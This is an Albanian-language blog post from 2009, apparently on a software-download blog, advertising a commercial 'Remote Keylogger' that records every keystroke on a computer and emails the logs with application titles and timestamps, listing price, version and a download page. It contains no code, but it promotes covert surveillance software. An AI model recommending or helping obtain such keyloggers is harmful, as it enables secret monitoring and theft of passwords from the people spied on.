Kerko me Shume ne Web

Remote Keylogger

Saturday, 7 November 2009

Remote Keylogger


Spiun-Keylogger.com

Regjistro çdo keystroke në një kompjuter dhe ta dërgojnë atë me anë të postës elektronike. Log-skedar përfshin titullin e aplikimit që shtypen në dhe data dhe koha në të shtypur.Software Cmimi: $ 39,95

Software Version: 2.7

Software-Release Date: 11-19-03Size: 0,11 MB

Platformë: Win95, Win98, WinNT 4.x, Windows2000, WinXPDownload Page: Remote Keylogger Download

0 comments

Post a Comment

You4Dating.com | Rtk Live | Albasoul Mp3 | Tv dhe Radio | Lajme dhe info

McAfee Antivirus Program i shpallur si me te Fuqishmit kunder Virusave

Nese sado pak ju ka ndihmuar Blogu yne ,atehere ju lutem ngarkoni keto dy linke ne Websitet Tuaja qe jane:http://www.you4dating.com/ si dhe blogu yne per ju ne shqip me informacione te shumta nga te gjitha lemit.http://shkarko-programe.blogspot.com/Faleminderit dhe Respekt.